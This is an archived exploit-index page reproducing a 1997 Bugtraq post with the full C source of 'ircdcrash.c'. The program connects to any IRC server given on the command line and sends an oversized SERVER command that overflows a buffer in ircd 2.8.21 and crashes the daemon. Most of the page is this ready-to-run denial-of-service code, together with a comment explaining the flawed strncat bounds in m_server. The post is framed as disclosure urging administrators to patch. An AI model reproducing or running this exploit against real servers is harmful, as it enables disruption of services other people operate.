ircd overflow DOS

Summary
Description:You can overflow the third argument to the SERVER irc command, and crash IRC servers. With all the lamer wannabe hackers on IRC, I would hope this is already fixed on all servers of any consequence.
Author:Aaron Campbell <aaron@UG.CS.DAL.CA> wrote the exploit
Compromise:Stupid DOS attack
Vulnerable Systems:Those running ircd2.8.21 and probably older versions.
Date:2 July 1997
Details


Date: Wed, 2 Jul 1997 19:39:58 -0300
From: Aaron Campbell <aaron@UG.CS.DAL.CA>
To: BUGTRAQ@NETSPACE.ORG
Subject: ircd exploit

Here's an exploit I wrote for the buffer overflow in ircd mentioned earlier
on the list by Andy Church. This will attempt to crash the daemon. Everyone
patch up.

---8<-------------------------- cut here ------------------------8<--------

/* ircdcrash.c by fx of nnh (aaron@ug.cs.dal.ca)
 *
 * Shouts out to: Punisher, TCroc, NC, gg, A-Flat, DBN3 crew.
 *
 * Thanks to Andy Church for addressing this problem on Bugtraq.
 *
 * There is a buffer overflow condition in the ircd/s_serv.c file of the
 * ircd2.8.21 distribution and most likely exists in other versions. It is
 * possible to exploit this by sending a very long string as the third
 * parameter (<info>) to the SERVER command. Nothing particularly fancy here,
 * this program will just attempt to segfault the daemon. Here is the syntax
 * of the SERVER command:
 *
 * SERVER <servername> <hopcount> <info>
 *
 * Here is the offending code, out of the m_server function:
 *
 *       if (parc > 3 && atoi(parv[2]))
 *          {
 *              hop = atoi(parv[2]);
 *              (void)strncpy(info, parv[3], REALLEN);
 *          }
 *       else if (parc > 2)
 *          {
 *              (void)strncpy(info, parv[2], REALLEN);
 *              if (parc > 3)
 *                  {
 *                              i = strlen(info);
 *                              (void)strncat(info, " ", REALLEN - i - 1);
 *                              (void)strncat(info, parv[3], REALLEN - i - 2);
 *                  }
 *
 * REALLEN is defined to be 50 in include/struct.h. Notice that in order for
 * the second (and therefore third) if() statement to be executed,
 * atoi(parv[2]) must NOT return a value. This means we must not send
 * numeric characters as the second parameter (<hopcount>), but we must send
 * 50 characters to ensure REALLEN - i - 2 will be less then 0.
 *
 * See Andy Church's post on Bugtraq for a patch.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/uio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>

int main(int argc, char *argv[])
{
        char *str;
        int i, port = 6667, soc;
        struct sockaddr_in their_addr;

        /* open a socket for connecting */
        if ( (soc = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) {
                perror("socket");
                exit(0);
        }

        if ( argc < 2 ) {
                printf("Usage: %s <ip_of_irc_server> <port>\n", argv[0]);
                exit(1);
        }
        else
                if ( argc > 2 )
                        port = atoi(argv[2]);

        /* fill-in target address struct */
        their_addr.sin_family = AF_INET;
        their_addr.sin_port = htons(port);
        their_addr.sin_addr.s_addr = inet_addr(argv[1]);
        bzero(&(their_addr.sin_zero),8);

        /* copy data into our string */
        str = (char *)malloc(4096);
        strcpy(str, "SERVER warez.blackdown.org aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa :[");

        printf("\nCreating string to send... Wait a sec...\n");

        for (i = 0; i < 4000; i++)
                strcat(str, "o");
        strcat(str, "]\n");

        /* connect to target server */
        if ( connect(soc, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) < 0 )        {
                perror("connect");
                exit(1);
        }
        else    {

                /* server might have something to say... wait... */
                printf("Wait... Server might be talking to us...\n");
                sleep(8);

                /* send string */
                printf("Sending crash string...");
                if ( send(soc, str, strlen(str), 0) < 0 )       {
                        perror("send");
                        exit(1);
                }

                /* finished */
                printf("Done!\n\n");
                close(soc);
                return(1);
        }
}

---8<-------------------------- cut here ------------------------8<--------

---
 Aaron Campbell (aaron@ug.cs.dal.ca)
 Dalhousie University, Halifax, Nova Scotia

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]